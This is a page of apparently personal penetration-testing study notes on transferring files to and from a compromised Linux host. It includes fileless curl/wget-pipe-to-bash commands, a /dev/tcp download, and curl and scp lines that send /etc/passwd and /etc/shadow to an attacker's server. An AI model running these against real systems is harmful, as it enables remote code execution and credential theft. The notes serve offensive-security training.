📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Transfer files to target machine
  • Base64 Encoding / Decoding
  • Web Downloads with Wget and cURL
  • Fileless Attacks Using Linux
  • Download with Bash (/dev/tcp)
  • SSH Downloads
  • Get files from target host to our attack machine
  • Web Upload
  • Alternative Web Server Method
  • SCP Upload
  1. File Transfers

Linux File Transfer

This sections contains different methods to transfer a file to or from a windows machine.

Transfer files to target machine

Base64 Encoding / Decoding

# Check File MD5 hash
md5sum id_rsa

# Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo

# We copy this content, paste it onto our Linux target machine, and use base64 with the option `-d' to decode it.

# Decode the File
echo -n 'LS0t---S0tLQo=' | base64 -d > id_rsa

# Confirm the MD5 Hashes Match
md5sum id_rsa

Web Downloads with Wget and cURL

# Download a File Using cURL
curl -o /tmp/LinEnum.sh /rebootuser/LinEnum/master/LinEnum.sh

# Download a File Using wget
wget <https://rebootuser/LinEnum/master/LinEnum.sh> -O /tmp/LinEnum.sh

Fileless Attacks Using Linux

# Fileless Download with cURL
curl https://URL/LinEnum.sh | bash

# Fileless Download with wget
wget -qO- https://URL/helloworld.py | python3

Download with Bash (/dev/tcp)

# Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80

# HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\\n\\n">&3

# Print the Response
cat <&3

SSH Downloads

# Enabling the SSH Server
sudo systemctl enable ssh

# Starting the SSH Server
sudo systemctl start ssh

# Checking for SSH Listening Port
netstat -lnpt

# Downloading Files Using SCP
scp plaintext@192.168.49.128:/root/myroot.txt .

Get files from target host to our attack machine

Web Upload

# Install uploadserver
python3 -m pip install --user uploadserver

# Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# creating a new directory to host the file for our webserver.
mkdir https && cd https

# start web server
python3 -m uploadserver 443 --server-certificate /root/server.pem

# Upload Multiple Files - from target host
curl -X POST <https://192.168.49.128/upload> -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative Web Server Method

# Creating a Web Server with Python3
python3 -m http.server

# Creating a Web Server with Python2.7
python2.7 -m SimpleHTTPServer

# Creating a Web Server with PHP
php -S 0.0.0.0:8000

# Creating a Web Server with Ruby
ruby -run -ehttpd . -p8000

# Download the File from the Target Machine onto the Pwnbox
wget 192.168.49.128:8000/filetotransfer.txt

SCP Upload

# We may find some companies that allow the SSH protocol (TCP/22) for outbound connections, and if that's the case, we can use an SSH server with the scp utility to upload files. Let's attempt to upload a file using the SSH protocol.
# run the comand and enter user and pass
scp /etc/passwd user@192.168.49.128:/home/user/
PreviousWindows File TransferNextLinux Local Password Attacks

Last updated 2 years ago